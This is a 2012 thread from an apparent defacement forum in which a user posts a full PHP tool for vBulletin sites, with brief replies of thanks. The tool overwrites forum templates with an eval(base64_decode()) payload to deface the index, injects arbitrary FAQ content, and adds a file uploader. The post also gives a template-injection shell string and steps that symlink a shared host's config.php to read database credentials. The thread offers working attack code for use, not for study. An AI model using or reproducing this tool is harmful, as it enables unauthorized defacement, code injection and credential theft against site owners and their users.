Anti-armenia.ORG - Forumlar - vBulltein Index Changer + Upload + Inject Faq.php xD



Istifadəçi
    2012-02-03 10:42 GMT                 

Dr.KroOoZ



C0d3r
Mesaj Sayı : 127
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   11  
Indi Saytda : Durum
Cinsiyyət :
Şəhər :
Ölkə :
Məslək : Dr.KroOoZ
Yaş :
Mesaj :

Mövzunu Paylaş!


Hello ,

i Develop This To , Its Change INDEX + INJECT FAQ With Shell + Upload
Kod:
<?
$localhost=  $_POST['f1'];
$database =  $_POST['f2'];
$username =  $_POST['f3'];
$password =  $_POST['f4'];
$index    =  $_POST['index'];

if($database=$_POST['f2']){
$con =@ mysql_connect($localhost,$username,$password) or die;
$db =@ mysql_select_db($database,$con) or die;

$index=str_replace("\'","'",$index);
$attack  = "{\${eval(base64_decode(\'";
$attack .= base64_encode("echo \"$index\";");
$attack .= "\'))}}{\${exit()}}</textarea>";
$query = "UPDATE template SET template = '$attack'" or die;
$result =@ mysql_query($query,$con);
if($result){
echo "<p align='center'><b><font face='Consolas'><marquee behavior='alternate' bgcolor='#FFFFFF' style='color: #008000; ' />[ Update Finish ]</marquee></font></b></p>";
}
else {
echo "<p align='center'><font face='Consolas' color='#FF0000' ><marquee behavior='alternate' bgcolor='#FFFFFF' style='font-weight: bold'>[ Please Check Database Information ]</marquee></font></p>";
}
}
?>

<title>vBulltein Index Changer || Develop By : Dr.KroOoZ</title>

<p dir="ltr" align="center"><font face="Consolas" size="2">Dr.KroOoZ : Root@ttgsa.com</font></p>
<p dir="ltr" align="center"><font size="2" color="#FF0000" face="Consolas">vBulltein</font><font size="2" face="Consolas"> Index Changer</font></p>
<form method = "POST">
<table border = "1" width="443" height="316" style="text-align: center" align="center">
<tr>
<td height="105" width="780" bgcolor="#FFFFFF" style="color: #FF0000; font-family: Tahoma; border: 1px dashed #808080" >
<p align="center"><font face="Consolas" size="2">Host : 
</font> 
<font color="#FFFFFF"> 
<input name="f1" size="20" value="localhost" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080" ></font><font face="Consolas" size="2">&nbsp;
DataBase&nbsp;: </font> <font color="#FFFFFF">
<input name = "f2" size="20" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080"></font></p>
<p align="center"><font face="Consolas" size="2">&nbsp;User : </font>
<input name = "f3" size="20" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080"><font face="Consolas" size="2">
&nbsp;Password :&nbsp; </font>
<input name = "f4" size="20" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080" ></td>
</tr>
<tr>
<td height="167" width="780" bgcolor="#FFFFFF" style="color: #FF0000; font-family: Tahoma; border: 1px dashed #808080"><p align="center">
<font face="Consolas" size="2">&nbsp;</font><font face="Consolas" color="#FFFFFF"><textarea name="index" cols=53 rows=8>Hacked By Dr.KroOoZ </textarea></font><p align="center">
<input type = "submit" value = "Change Index" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080"><font face="Consolas" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</font>
<input type = "reset" value = "Delete Codes" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080" ></td>
</tr>
</tr>
</table>
</form>
<p align="center"><font face="Consolas" size="2"><font color="#FF0000">&nbsp;Upload</font>
Files</font></p>
<?
echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080">';
echo '<font face="Consolas"><font size="2">&nbsp;</font><input type="file" name="file" size="57" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080"><input name="_upl" type="submit" id="_upl" value="Upload" style="color: #FF0000; font-family: Consolas; border: 1px dashed #808080"></font></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<font face="Consolas" size="2"><font color="#FF0000">Upload Complete :D</font><br><br>'; }
else { echo '<font color="#008000">Upload Failed ;(<br></font><br>'; }
echo '<font color="#808080">By Dr.KroOoZ - Root@ttgsa.com </font></font></center>';
}
echo "<p align='center'><font face='Consolas' size='2'><font color='#FF0000' />&nbsp;Inject</font>
FaQ</font></p>";
if(empty($_POST['faq'])){
echo "
<center>
<FORM method=\"POST\">
<font face='Consolas' size='2'>host : </font>
<INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\" style='color: #FF0000; font-family: Consolas; border: 1px dashed #808080'><font face='Consolas' size='2'>
database : </font>
<INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\" style='color: #FF0000; font-family: Consolas; border: 1px dashed #808080'><font face='Consolas' size='2'><br>
username : </font>
<INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\" style='color: #FF0000; font-family: Consolas; border: 1px dashed #808080'><font face='Consolas' size='2'>
password : </font>
<INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\" style='color: #FF0000; font-family: Consolas; border: 1px dashed #808080'><font face='Consolas' size='2'><br>
</font>
      <br>
<textarea name=\"faq\" cols=\"40\" rows=\"10\" style='color: #FF0000; font-family: Tahoma; border: 1px dashed #808080'>Inject Faq.PHP :D</textarea><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\" style='color: #FF0000; font-family: Tahoma; border: 1px dashed #808080'>
</FORM>
</center>";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$faq     = $_POST['faq'];
         @mysql_connect($localhost,$username,$password) or die(mysql_error());
         @mysql_select_db($database) or die(mysql_error());

$index=str_replace("\'","'",$faq);
$set_faq .= ("$faq");
$set_faq .= " ";
$ok=@mysql_query("UPDATE template SET template ='".$set_faq."' WHERE title ='faq'") or die(mysql_error());

if($ok){
echo "!! update finish !!<br><br>";
}
}
?>
<!-- Footer -->
<p align="center"><font face="Consolas" size="2">Develop By :
<font color="#C0C0C0">Dr.KroOoZ</font></font></p>
<p align="center"><font face="Consolas" size="2">Greets 2 : </font>
<font face="Consolas" size="2" color="#C0C0C0">New KilleR</font><font color="#008080" face="Consolas" size="2">
</font><font face="Consolas" size="2" color="#C0C0C0">,</font><font color="#008080" face="Consolas" size="2">
</font><font face="Consolas" size="2" color="#C0C0C0">MjNooN-HaCkER , TTG ,
TiGeR Yemen </font></p>


U Can Inject From This SHeLL
Kod:
$spacer_open
{${eval(base64_decode(''))}}{${exit()}}&
$_phpinclude_output


How To Use :-
1- Run Command [ ln -s /home/user/www/Path/includes/config.php 001.txt
2- Open 001.txt Then But [ Database , Host , username , password ]
3- Then CHANGE INDEX OR INJECT FAQ

Anti-armenia.ORG
    

Istifadəçi
    2012-02-03 11:58 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Super!!!
Thank you very much!
+1rep

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
    

Istifadəçi
    2012-02-03 14:50 GMT                 

Dr.KroOoZ



C0d3r
Mesaj Sayı : 127
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   11  
Indi Saytda : Durum
Cinsiyyət :
Şəhər :
Ölkə :
Məslək : Dr.KroOoZ
Yaş :
Mesaj :

Mövzunu Paylaş!


Your Welcome

Anti-armenia.ORG